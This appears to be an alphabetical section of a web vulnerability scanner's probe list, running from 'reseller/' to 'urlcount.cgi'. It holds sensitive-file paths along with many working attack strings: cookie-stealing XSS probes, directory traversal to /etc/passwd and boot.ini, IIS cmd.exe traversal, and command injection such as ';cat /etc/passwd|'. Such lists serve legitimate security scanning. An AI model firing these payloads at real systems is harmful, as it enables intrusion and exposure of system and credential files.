reseller/
|
||
|
|
responder.cgi
|
||
|
|
restricted/
|
||
|
|
retail/
|
||
|
|
retrieve_password.pl
|
||
|
|
reviews/newpro.cgi
|
||
|
|
rguest.exe
|
||
|
|
rightfax/fuwww.dll/?
|
||
|
|
rksh
|
||
|
|
rmp_query
|
||
|
|
robadmin.cgi
|
||
|
|
robpoll.cgi
|
||
|
|
room/save_item.php
|
||
|
|
root
|
||
|
|
root/
|
||
|
|
rpc.php?q="><script>alert(document.cookie)</script>
|
||
|
|
rpc.php?q='&t='
|
||
|
|
rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
|
||
|
|
rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
|
||
|
|
rpm_query
|
||
|
|
rsh
|
||
|
|
rtm.log
|
||
|
|
rubrique.asp?no=%60/etc/passwd%60|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'.
|
||
|
|
rubrique.asp?no=....//....//....//....//....//....//....//etc.passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
rubrique.asp?no=../../../../../../../../../etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
rubrique.asp?no=/....../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
rubrique.asp?no=/.../.../.../.../.../.../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
rubrique.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
rubrique.asp?no=/../../../../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
rubrique.asp?no=/../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
rubrique.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
rubrique.asp?no=/etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
rubrique.asp?no=/etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'.
|
||
|
|
rubrique.asp?no=c:\boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'c:'.
|
||
|
|
rwcgi60
|
||
|
|
rwcgi60/showenv
|
||
|
|
rwwwshell.pl
|
||
|
|
sales/
|
||
|
|
sam
|
||
|
|
sam._
|
||
|
|
sam.bin
|
||
|
|
sample/
|
||
|
|
sample/faqw46
|
||
|
|
sample/framew46
|
||
|
|
sample/pagesw46
|
||
|
|
sample/siregw46
|
||
|
|
sample/site1w4646
|
||
|
|
sample/site2w4646
|
||
|
|
sample/site3w4646
|
||
|
|
samples/
|
||
|
|
samples/search.dll?query=<script>alert(document.cookie)</script>
|
||
|
|
samples/search/queryhit.htm
|
||
|
|
save/
|
||
|
|
sawmill5?rfcf+%22/etc/passwd%22+spbn+1,1,21,1,1,1,1
|
||
|
|
sawmill?rfcf+%22
|
||
|
|
sawmill?rfcf+%22SawmillInfo/SawmillPassword%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
|
||
|
|
sbcgi/sitebuilder.cgi
|
||
|
|
sca/menu.jsp
|
||
|
|
schema50.nsf
|
||
|
|
scoadminreg.cgi
|
||
|
|
scozbook/view.php?PG=whatever
|
||
|
|
scr/
|
||
|
|
scratch
|
||
|
|
screen.php
|
||
|
|
script>alert('Vulnerable')</script>.cfm
|
||
|
|
scripts
|
||
|
|
scripts/*%0a.pl
|
||
|
|
scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
|
||
|
|
scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver
|
||
|
|
scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
|
||
|
|
scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
|
||
|
|
scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\"
|
||
|
|
scripts/CGImail.exe
|
||
|
|
scripts/Carello/Carello.dll
|
||
|
|
scripts/admin.pl
|
||
|
|
scripts/cfgwiz.exe
|
||
|
|
scripts/contents.htm
|
||
|
|
scripts/convert.bas
|
||
|
|
scripts/counter.exe
|
||
|
|
scripts/cphost.dll
|
||
|
|
scripts/cpshost.dll
|
||
|
|
scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini
|
||
|
|
scripts/fpadmcgi.exe
|
||
|
|
scripts/fpadmin.htm
|
||
|
|
scripts/fpcount.exe
|
||
|
|
scripts/fpremadm.exe
|
||
|
|
scripts/fpsrvadm.exe
|
||
|
|
scripts/httpodbc.dll
|
||
|
|
scripts/iisadmin/bdir.htr
|
||
|
|
scripts/iisadmin/ism.dll
|
||
|
|
scripts/no-such-file.pl
|
||
|
|
scripts/postinfo.asp
|
||
|
|
scripts/proxy/w3proxy.dll
|
||
|
|
scripts/repost.asp
|
||
|
|
scripts/root.exe?/c+dir+c:\+/OG
|
||
|
|
scripts/samples/ctguestb.idc
|
||
|
|
scripts/samples/search/author.idq
|
||
|
|
scripts/samples/search/filesize.idq
|
||
|
|
scripts/samples/search/filetime.idq
|
||
|
|
scripts/samples/search/qfullhit.htw
|
||
|
|
scripts/samples/search/qsumrhit.htw
|
||
|
|
scripts/samples/search/queryhit.idq
|
||
|
|
scripts/samples/search/simple.idq
|
||
|
|
scripts/samples/search/webhits.exe
|
||
|
|
scripts/slxweb.dll/getfile?type=Library&file=[invalid filename]
|
||
|
|
scripts/tools/ctss.idc
|
||
|
|
scripts/tools/dsnform
|
||
|
|
scripts/tools/dsnform.exe
|
||
|
|
scripts/tools/getdrvrs.exe
|
||
|
|
scripts/tools/newdsn.exe
|
||
|
|
scripts/tradecli.dll
|
||
|
|
scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir
|
||
|
|
scripts/weblog
|
||
|
|
scripts/wsisa.dll/WService=anything?WSMadmin
|
||
|
|
se/?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
|
||
|
|
search.asp?Search=
|
||
|
|
search.asp?Search=\"><script>alert(Vulnerable)</script>
|
||
|
|
search.asp?term=<%00script>alert('Vulnerable')</script>
|
||
|
|
search.cgi
|
||
|
|
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini
|
||
|
|
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini
|
||
|
|
search.php?mailbox=INBOX&what=x&where=<script>alert('Vulnerable!')</script>&submit=Search
|
||
|
|
search.php?searchfor=\"><script>alert('Vulnerable');</script>
|
||
|
|
search.php?searchstring=<script>alert(document.cookie)</script>
|
||
|
|
search.php?sess=your_session_id&lookfor=<script>alert(document.cookie)</script>
|
||
|
|
search.php?zoom_query=<script>alert(\"hello\")</script>
|
||
|
|
search.pl
|
||
|
|
search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>
|
||
|
|
search.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('XSS')</script>
|
||
|
|
search.pl?form=../../../../../../../../../../etc
|
||
|
|
search.pl?form=../../../../../../../../../../etc/passwd%00
|
||
|
|
search.vts
|
||
|
|
search/
|
||
|
|
search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script>
|
||
|
|
search/SQLQHit.asp
|
||
|
|
search/htx/SQLQHit.asp
|
||
|
|
search/htx/sqlqhit.asp
|
||
|
|
search/inc/
|
||
|
|
search/index.cfm?<script>alert(\"Vulnerable\")</script>
|
||
|
|
search/results.stm?query=<script>alert('vulnerable');</script>
|
||
|
|
search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../../etc
|
||
|
|
search/search.cgi?keys=*&prc=any&catigory=../../../../../../../../../../../etc
|
||
|
|
search/sqlqhit.asp
|
||
|
|
search97.vts
|
||
|
|
search?NS-query-pat=../../../../../../../../../../etc/passwd
|
||
|
|
search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini
|
||
|
|
secret.nsf
|
||
|
|
secret/
|
||
|
|
secure/
|
||
|
|
securecontrolpanel/
|
||
|
|
secured/
|
||
|
|
securelogin/1,2345,A,00.html
|
||
|
|
security/web_access.html
|
||
|
|
sell/
|
||
|
|
sendform.cgi
|
||
|
|
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message
|
||
|
|
sendphoto.php
|
||
|
|
sendtemp.pl?templ=../../../../../../../../../../etc
|
||
|
|
sendtemp.pl?templ=../../../../../../../../../../etc/passwd
|
||
|
|
sensepost.exe?/c+dir
|
||
|
|
server-info
|
||
|
|
server-status
|
||
|
|
server/
|
||
|
|
server_stats/
|
||
|
|
servers/link.cgi
|
||
|
|
service/
|
||
|
|
services/
|
||
|
|
servicio/
|
||
|
|
servicios/
|
||
|
|
servlet/AdminServlet
|
||
|
|
servlet/ContentServer?pagename=<script>alert('Vulnerable')</script>
|
||
|
|
servlet/CookieExample?cookiename=<script>alert(\"Vulnerable\")</script>
|
||
|
|
servlet/Counter
|
||
|
|
servlet/DateServlet
|
||
|
|
servlet/FingerServlet
|
||
|
|
servlet/HelloWorldServlet
|
||
|
|
servlet/IsItWorking
|
||
|
|
servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script>
|
||
|
|
servlet/PrintServlet
|
||
|
|
servlet/SchedulerTransfer
|
||
|
|
servlet/SearchServlet
|
||
|
|
servlet/ServletManager
|
||
|
|
servlet/SessionManager
|
||
|
|
servlet/SessionServlet
|
||
|
|
servlet/SimpleServlet
|
||
|
|
servlet/SnoopServlet
|
||
|
|
servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22a
|
||
|
|
servlet/allaire.jrun.ssi.SSIFilter
|
||
|
|
servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter
|
||
|
|
servlet/com.newatlanta.servletexec.JSP10Servlet/
|
||
|
|
servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa
|
||
|
|
servlet/com.unify.servletexec.UploadServlet
|
||
|
|
servlet/custMsg?guestName=<script>alert(\"Vulnerable\")</script>
|
||
|
|
servlet/gwmonitor
|
||
|
|
servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml
|
||
|
|
servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script>
|
||
|
|
servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script>
|
||
|
|
servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script>
|
||
|
|
servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script>
|
||
|
|
servlet/sq1cdsn
|
||
|
|
servlet/sqlcdsn
|
||
|
|
servlet/sunexamples.BBoardServlet
|
||
|
|
servlet/webacc
|
||
|
|
servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00
|
||
|
|
servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00
|
||
|
|
servlet/webacc?User.html=noexist
|
||
|
|
servlet/webpub
|
||
|
|
servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>
|
||
|
|
servlets/SchedulerTransfer
|
||
|
|
servlets/weboam/oam/oamLogin
|
||
|
|
session/adminlogin
|
||
|
|
session/admnlogin
|
||
|
|
setpasswd.cgi
|
||
|
|
settings/site.ini
|
||
|
|
setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P
|
||
|
|
setup.nsf
|
||
|
|
setup/
|
||
|
|
setupweb.nsf
|
||
|
|
sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd
|
||
|
|
sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script>
|
||
|
|
sh
|
||
|
|
shop.cgi?page=../../../../../../../etc/passwd
|
||
|
|
shop.pl/page=;cat%20shop.pl|
|
||
|
|
shop/
|
||
|
|
shop/auth_data/auth_user_file.txt
|
||
|
|
shop/database/metacart.mdb
|
||
|
|
shop/member_html.cgi?file=;cat%20/etc/passwd|
|
||
|
|
shop/member_html.cgi?file=|cat%20/etc/passwd|
|
||
|
|
shop/normal_html.cgi?file=<script>alert(\"Vulnerable\")</script>
|
||
|
|
shop/normal_html.cgi?file=../../../../../../etc/issue%00
|
||
|
|
shop/normal_html.cgi?file=;cat%20/etc/passwd|
|
||
|
|
shop/normal_html.cgi?file=|cat%20/etc/passwd|
|
||
|
|
shop/orders/orders.txt
|
||
|
|
shop/php_files/site.config.php+
|
||
|
|
shop/search.php
|
||
|
|
shop/show.php
|
||
|
|
shopa_sessionlist.asp
|
||
|
|
shopadmin.asp
|
||
|
|
shopadmin.asp?Password=abc&UserName="><script>alert(foo)</script>
|
||
|
|
shopdbtest.asp
|
||
|
|
shopexd.asp?catalogid='42
|
||
|
|
shoponline/fpdb/shop.mdb
|
||
|
|
shopper.cgi?newpage=../../../../../../../../../../etc
|
||
|
|
shopper.cgi?newpage=../../../../../../../../../../etc/passwd
|
||
|
|
shopper/
|
||
|
|
shopping/database/metacart.mdb
|
||
|
|
shopping/diag_dbtest.asp
|
||
|
|
shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script>
|
||
|
|
shopping300.mdb
|
||
|
|
shopping400.mdb
|
||
|
|
shoppingdirectory/midicart.mdb
|
||
|
|
shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
|
||
|
|
shoutbox.php?conf=../../../../../../../etc/passwd
|
||
|
|
shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20
|
||
|
|
show.pl
|
||
|
|
showcat.php?catid=<Script>JavaScript:alert('Vulnerable');</Script>
|
||
|
|
showcheckins.cgi?person=<script>alert('Vulnerable')</script>
|
||
|
|
showcheckins.cgi?person=<script>alert('XSS')</script>
|
||
|
|
showmail.pl
|
||
|
|
showmail.pl?Folder=<script>alert(document.cookie)</script>
|
||
|
|
showuser.cgi
|
||
|
|
shtml.dll
|
||
|
|
signon
|
||
|
|
simple/view_page?mv_arg=|cat%20/etc/passwd|
|
||
|
|
simplebbs/users/users.php
|
||
|
|
simplestguest.cgi
|
||
|
|
simplestmail.cgi
|
||
|
|
sips/sipssys/users/a/admin/user
|
||
|
|
site/'
|
||
|
|
site/eg/source.asp
|
||
|
|
site/iissamples/
|
||
|
|
site_searcher.cgi
|
||
|
|
sitemap.xml
|
||
|
|
siteminder
|
||
|
|
siteminder/smadmin.html
|
||
|
|
siteseed/
|
||
|
|
siteserver/publishing/viewcode.asp?source=/default.asp
|
||
|
|
smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
|
||
|
|
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20/etc/passwd|
|
||
|
|
smbcfg.nsf
|
||
|
|
smconf.nsf
|
||
|
|
smency.nsf
|
||
|
|
smg_Smxcfg30.exe?vcc=3560121183d3
|
||
|
|
smhelp.nsf
|
||
|
|
smmsg.nsf
|
||
|
|
smquar.nsf
|
||
|
|
smsolar.nsf
|
||
|
|
smssend.php
|
||
|
|
smtime.nsf
|
||
|
|
smtp.box
|
||
|
|
smtp.nsf
|
||
|
|
smtpibwq.nsf
|
||
|
|
smtpobwq.nsf
|
||
|
|
smtptbls.nsf
|
||
|
|
smvlog.nsf
|
||
|
|
soap/servlet/soaprouter
|
||
|
|
soapConfig.xml
|
||
|
|
soapdocs/ReleaseNotes.html
|
||
|
|
soapdocs/webapps/soap/
|
||
|
|
soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml
|
||
|
|
software.nsf
|
||
|
|
software/
|
||
|
|
soinfo.php?\"><script>alert('Vulnerable')</script>
|
||
|
|
sojourn.cgi?cat=../../../../../../../../../../etc
|
||
|
|
sojourn.cgi?cat=../../../../../../../../../../etc/password%00
|
||
|
|
solaris/
|
||
|
|
some.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42
|
||
|
|
some.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42
|
||
|
|
some.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42
|
||
|
|
source/
|
||
|
|
spelling.php3+
|
||
|
|
spin_client.cgi?aaaaaaaa
|
||
|
|
spwd
|
||
|
|
sql/
|
||
|
|
sqldump.sql
|
||
|
|
sqlnet.log
|
||
|
|
sqlqhit.asp
|
||
|
|
squirrelmail/src/read_body.php
|
||
|
|
src/
|
||
|
|
src/read_body.php?mailbox=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&passed_id=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&startMessage=1&show_more=0
|
||
|
|
srchadm
|
||
|
|
srvinst.nsf
|
||
|
|
srvnam.htm
|
||
|
|
srvstatus.chl+
|
||
|
|
ss
|
||
|
|
ss.cfg
|
||
|
|
ss000007.pl?PRODREF=<script>alert('Vulnerable')</script>
|
||
|
|
sscd_suncourier.pl
|
||
|
|
ssdefs/siteseed.dtd
|
||
|
|
ssi/
|
||
|
|
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
|
||
|
|
ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\
|
||
|
|
staff/
|
||
|
|
start.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E
|
||
|
|
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E
|
||
|
|
start.php?config=alper.inc.php
|
||
|
|
stat.htm
|
||
|
|
stat.pl
|
||
|
|
stat/
|
||
|
|
staticpages/index.php
|
||
|
|
statistic/
|
||
|
|
statistics/
|
||
|
|
statmail.nsf
|
||
|
|
statrep.nsf
|
||
|
|
stats-bin-p/reports/index.html
|
||
|
|
stats.htm
|
||
|
|
stats.html
|
||
|
|
stats.pl
|
||
|
|
stats.prf
|
||
|
|
stats.txt
|
||
|
|
stats/
|
||
|
|
stats/statsbrowse.asp?filepath=c:\&Opt=3
|
||
|
|
stats_old/
|
||
|
|
statsconfig
|
||
|
|
status.php3
|
||
|
|
status/
|
||
|
|
status?full=true
|
||
|
|
statusconfig.pl
|
||
|
|
statview.pl
|
||
|
|
stauths.nsf
|
||
|
|
stautht.nsf
|
||
|
|
stconf.nsf
|
||
|
|
stconfig.nsf
|
||
|
|
stdnaset.nsf
|
||
|
|
stdomino.nsf
|
||
|
|
stlog.nsf
|
||
|
|
store.cgi?
|
||
|
|
store.cgi?StartID=../../../../../../../../../../etc/passwd%00.html
|
||
|
|
store/
|
||
|
|
store/agora.cgi?cart_id=<script>alert('Vulnerable')</script>
|
||
|
|
store/agora.cgi?cart_id=<script>alert('XSS')</script>
|
||
|
|
store/agora.cgi?page=whatever33.html
|
||
|
|
store/index.cgi?page=../../../../../../../../etc/passwd
|
||
|
|
story.pl?next=../../../../../../../../../../etc
|
||
|
|
story.pl?next=../../../../../../../../../../etc/passwd%00
|
||
|
|
story/story.pl?next=../../../../../../../../../../etc/passwd%00
|
||
|
|
story/story.pl?next=../../../../../../../../../../passwd%00
|
||
|
|
streg.nsf
|
||
|
|
stronghold-info
|
||
|
|
stronghold-status
|
||
|
|
structure.sql
|
||
|
|
stsrc.nsf
|
||
|
|
style/
|
||
|
|
styles/
|
||
|
|
stylesheet/
|
||
|
|
stylesheets/
|
||
|
|
subir/
|
||
|
|
submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview
|
||
|
|
submit?setoption=q&option=allowed_ips&value=255.255.255.255
|
||
|
|
sun/
|
||
|
|
sunshop.index.php?action=storenew&username=<script>alert('Vulnerable')</script>
|
||
|
|
super_stats/access_logs
|
||
|
|
super_stats/error_logs
|
||
|
|
support/
|
||
|
|
support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd
|
||
|
|
support/messages
|
||
|
|
supporter/index.php
|
||
|
|
supporter/index.php?t=ticketfiles&id=<script><script>alert('Vulnerable')</script></script>
|
||
|
|
supporter/index.php?t=tickettime&id=<script><script>alert('Vulnerable')</script></script>
|
||
|
|
supporter/index.php?t=updateticketlog&id=<script><script>alert('Vulnerable')</script></script>
|
||
|
|
supporter/tupdate.php
|
||
|
|
surf/scwebusers
|
||
|
|
survey
|
||
|
|
survey.cgi
|
||
|
|
sw000.asp?|-|0|404_Object_Not_Found
|
||
|
|
swf
|
||
|
|
sws/admin.html
|
||
|
|
sws/manager.pl
|
||
|
|
sys/
|
||
|
|
syshelp/cscript/showfnc.stm?pkg=<script>alert(document.cookie)</script>
|
||
|
|
syshelp/cscript/showfncs.stm?pkg=<script>alert(document.cookie)</script>
|
||
|
|
syshelp/cscript/showfunc.stm?func=<script>alert(document.cookie)</script>
|
||
|
|
syshelp/stmex.stm?foo=123&bar=<script>alert(document.cookie)</script>
|
||
|
|
syshelp/stmex.stm?foo=<script>alert(document.cookie)</script>
|
||
|
|
syslog.htm?%20
|
||
|
|
system/
|
||
|
|
sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script>
|
||
|
|
sysuser/docmgr/edit.stm?name=<script>alert(document.cookie)</script>
|
||
|
|
sysuser/docmgr/edit.stm?path=<script>alert(document.cookie)</script>
|
||
|
|
sysuser/docmgr/ftp.stm?path=<script>alert(document.cookie)</script>
|
||
|
|
sysuser/docmgr/htaccess.stm?path=<script>alert(document.cookie)</script>
|
||
|
|
sysuser/docmgr/iecreate.stm?path=<script>alert(document.cookie)</script>
|
||
|
|
sysuser/docmgr/iecreate.stm?template=../
|
||
|
|
sysuser/docmgr/ieedit.stm?name=<script>alert(document.cookie)</script>
|
||
|
|
sysuser/docmgr/ieedit.stm?path=<script>alert(document.cookie)</script>
|
||
|
|
sysuser/docmgr/ieedit.stm?url=../
|
||
|
|
sysuser/docmgr/info.stm?name=<script>alert(document.cookie)</script>
|
||
|
|
sysuser/docmgr/info.stm?path=<script>alert(document.cookie)</script>
|
||
|
|
sysuser/docmgr/mkdir.stm?path=<script>alert(document.cookie)</script>
|
||
|
|
sysuser/docmgr/rename.stm?name=<script>alert(document.cookie)</script>
|
||
|
|
sysuser/docmgr/rename.stm?path=<script>alert(document.cookie)</script>
|
||
|
|
sysuser/docmgr/search.stm?path=<script>alert(document.cookie)</script>
|
||
|
|
sysuser/docmgr/search.stm?query=<script>alert(document.cookie)</script>
|
||
|
|
sysuser/docmgr/sendmail.stm?name=<script>alert(document.cookie)</script>
|
||
|
|
sysuser/docmgr/sendmail.stm?path=<script>alert(document.cookie)</script>
|
||
|
|
sysuser/docmgr/template.stm?path=<script>alert(document.cookie)</script>
|
||
|
|
sysuser/docmgr/update.stm?name=<script>alert(document.cookie)</script>
|
||
|
|
sysuser/docmgr/update.stm?path=<script>alert(document.cookie)</script>
|
||
|
|
sysuser/docmgr/vccheckin.stm?name=<script>alert(document.cookie)</script>
|
||
|
|
sysuser/docmgr/vccheckin.stm?path=<script>alert(document.cookie)</script>
|
||
|
|
sysuser/docmgr/vccreate.stm?name=<script>alert(document.cookie)</script>
|
||
|
|
sysuser/docmgr/vccreate.stm?path=<script>alert(document.cookie)</script>
|
||
|
|
sysuser/docmgr/vchist.stm?name=<script>alert(document.cookie)</script>
|
||
|
|
sysuser/docmgr/vchist.stm?path=<script>alert(document.cookie)</script>
|
||
|
|
tablebuild.pl
|
||
|
|
talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1
|
||
|
|
tar/
|
||
|
|
tarjetas/
|
||
|
|
tcb/files/auth/r/root
|
||
|
|
tcsh
|
||
|
|
technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../../etc/passwd
|
||
|
|
technote/main.cgi?board=FREE_BOARD&command=down_load&filename=/../../../../../../../../../etc/passwd
|
||
|
|
technote/print.cgi
|
||
|
|
temp/
|
||
|
|
template/
|
||
|
|
templates/form_header.php?noticemsg=<script>javascript:alert(document.cookie)</script>
|
||
|
|
temporal/
|
||
|
|
test
|
||
|
|
test-cgi.bat
|
||
|
|
test-cgi.exe?<script>alert(document.cookie)</script>
|
||
|
|
test-cgi.tcl
|
||
|
|
test-cgi?/*
|
||
|
|
test-env
|
||
|
|
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
|
||
|
|
test.cgi
|
||
|
|
test.htm
|
||
|
|
test.html
|
||
|
|
test.nsf
|
||
|
|
test.php
|
||
|
|
test.php%20
|
||
|
|
test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
|
||
|
|
test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x
|
||
|
|
test.txt
|
||
|
|
test/
|
||
|
|
test/info.php
|
||
|
|
test/jsp/Language.jsp
|
||
|
|
test/jsp/buffer1.jsp
|
||
|
|
test/jsp/buffer2.jsp
|
||
|
|
test/jsp/buffer3.jsp
|
||
|
|
test/jsp/buffer4.jsp
|
||
|
|
test/jsp/declaration/IntegerOverflow.jsp
|
||
|
|
test/jsp/extends1.jsp
|
||
|
|
test/jsp/extends2.jsp
|
||
|
|
test/jsp/pageAutoFlush.jsp
|
||
|
|
test/jsp/pageDouble.jsp
|
||
|
|
test/jsp/pageExtends.jsp
|
||
|
|
test/jsp/pageImport2.jsp
|
||
|
|
test/jsp/pageInfo.jsp
|
||
|
|
test/jsp/pageInvalid.jsp
|
||
|
|
test/jsp/pageIsErrorPage.jsp
|
||
|
|
test/jsp/pageIsThreadSafe.jsp
|
||
|
|
test/jsp/pageSession.jsp
|
||
|
|
test/phpinfo.php
|
||
|
|
test/realPath.jsp
|
||
|
|
test/test.cgi
|
||
|
|
testcgi.exe
|
||
|
|
testcgi.exe?<script>alert(document.cookie)</script>
|
||
|
|
testing/
|
||
|
|
tests/
|
||
|
|
texis.exe/?-dump
|
||
|
|
texis.exe/?-version
|
||
|
|
texis.exe/junk
|
||
|
|
texis/junk
|
||
|
|
texis/phine
|
||
|
|
texis/websearch/phine
|
||
|
|
textcounter.pl
|
||
|
|
thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin
|
||
|
|
theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session
|
||
|
|
theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\"><script>alert('Vulnerable')</script>,/system/status/session
|
||
|
|
theme1/selector?button=status,monitor,session&button_url=/system/status/status\"><script>alert('Vulnerable')</script>,/system/status/moniter,/system/status/session
|
||
|
|
theme1/selector?button=status,monitor,session\"><script>alert('Vulnerable')</script>&button_url=/system/status/status,/system/status/moniter,/system/status/session
|
||
|
|
themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script>
|
||
|
|
ticket.php?id=99999
|
||
|
|
tidfinder.cgi
|
||
|
|
tigvote.cgi
|
||
|
|
tinymsg.php
|
||
|
|
title.cgi
|
||
|
|
tmp/
|
||
|
|
tmp_view.php?file=/etc/passwd
|
||
|
|
today.nsf
|
||
|
|
tomcat-docs/index.html
|
||
|
|
tools/
|
||
|
|
topic/entete.php
|
||
|
|
topsitesdir/edit.php
|
||
|
|
tpgnrock
|
||
|
|
tpv/
|
||
|
|
trabajo/
|
||
|
|
trace.axd
|
||
|
|
traffic.cgi?cfg=../../../../../../../../etc/passwd
|
||
|
|
trafficlog/
|
||
|
|
transito/
|
||
|
|
tree
|
||
|
|
tree/
|
||
|
|
trees/
|
||
|
|
troops.cgi
|
||
|
|
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
|
||
|
|
tsweb/
|
||
|
|
ttawebtop.cgi/?action=start&pg=../../../../../../../../../../etc/passwd
|
||
|
|
ttawebtop.cgi/?action=start&pg=../../../../../../../../../../passwd
|
||
|
|
ttforum/index.php
|
||
|
|
ttp://127.0.0.1:2301/
|
||
|
|
tutos/file/file_new.php
|
||
|
|
tutos/file/file_select.php
|
||
|
|
tvcs/getservers.exe?action=selects1
|
||
|
|
typo3/typo3/dev/translations.php
|
||
|
|
typo3conf/
|
||
|
|
typo3conf/database.sql
|
||
|
|
typo3conf/localconf.php
|
||
|
|
uifc/MultFileUploadHandler.php+
|
||
|
|
ultraboard.cgi
|
||
|
|
ultraboard.pl
|
||
|
|
unlg1.1
|
||
|
|
unlg1.2
|
||
|
|
upd/
|
||
|
|
update.dpgs
|
||
|
|
updates/
|
||
|
|
upload.asp
|
||
|
|
upload.cgi
|
||
|
|
upload.cgi+
|
||
|
|
upload.php?type=\"<script>alert(document.cookie)</script>
|
||
|
|
uploader.php
|
||
|
|
uploadn.asp
|
||
|
|
uploadx.asp
|
||
|
|
uptime
|
||
|
|
url.jsp
|
||
|
|
urlcount.cgi?%3CIMG%20
|
||
|
|
urlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E
|
||
|
|
